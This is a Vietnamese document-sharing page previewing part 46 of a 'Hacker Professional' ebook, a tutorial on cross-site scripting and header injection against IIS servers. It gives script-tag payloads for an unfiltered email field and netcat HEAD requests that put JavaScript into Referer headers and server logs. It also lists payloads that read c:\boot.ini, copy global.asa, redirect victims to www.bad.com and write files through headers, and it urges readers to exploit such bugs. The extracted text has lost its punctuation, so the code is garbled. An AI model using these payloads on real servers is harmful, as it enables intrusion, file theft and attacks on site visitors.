Đang chuẩn bị liên kết để tải về tài liệu:
Hacker Professional Ebook part 46

Tham khảo tài liệu 'hacker professional ebook part 46', công nghệ thông tin, kỹ thuật lập trình phục vụ nhu cầu học tập, nghiên cứu và làm việc hiệu quả | email input- param email checks for valid email address something@something.com if email ZA S @ S . S prints email to html totally unfiltered. printhtml error email is not a valid email address else processemail email Bạn có thể đưa thông tin ví dụ script type text javascript alert hello script vào email address một error message sẽ được gởi tới clien và đoạn mã js sẽ được chạy ngay trên trình duyệt của hacker.Và ví dụ về những lổi này thì tôi không cần đưa lên đây vì trong box bảo mật có rất nhiều lổi nói về XSS bạn có thể tìm và khai thác chúng tăng thêm kỹ năng hack của bạn. Và tôi nói thêm trong việc chèn code js trong viêc tấn công qua cổng 80 xem ví dụ một số cách tấn công sau Thữ chèn một đoạn mã JS vào Referer C nc 127.0.0.3 80 HEAD Z HTTP 1.0 Referer script alert document.domain document.domain script HTTPd Response HTTP 1.1 200 OK Server Microsoft-IIS 4.0 Content-Location A href http 127.0.0.3 Default.htm target _blank FONT color abb2d5 http 127.0.0.3 Default.htm Content-Type text html Content-Length 4325 Chèn vào default.asp C nc 127.0.0.3 80 HEAD default script alert Cheers world script .asp HTTP 1.0 Software Microsoft Internet Information Server 4.0 Version 1.0 Date 2002-06-17 16 26 50 Fields time c-ip cs-method cs-uri-stem sc-status 16 26 50 127.0.0.3 HEAD Default.htm 200 16 27 04 127.0.0.3 HEAD default script alert Cheers world script .asp 200 16 41 15 127.0.11.3 GET default.asp 200 Những script mà attacker có thể sữ dung HEAD script SRC c boot.ini script HTTP 1.0 HEAD default.asp FileSystemObject.CopyFile c boot.ini boot.htm HTTP 1.0 GET script window.location http www.bad.com bad.htm script home.htm HTTP 1.0 GET default.asp FSObj.CopyFile global.asa global.txt Tiếp tục C nc 127.0.0.3 80 HEAD Default.asp HTTP 1.0 User-Agent Set fs CreateObject Scripting.FileSystemObject Referer Set a fs.CreateTextFile c testfile.txt True C nc 127.0.0.3 80 HEAD Default.asp HTTP 1.0 User-Agent a.WriteLine Here an attacker would Referer a.WriteLine build a file o-n .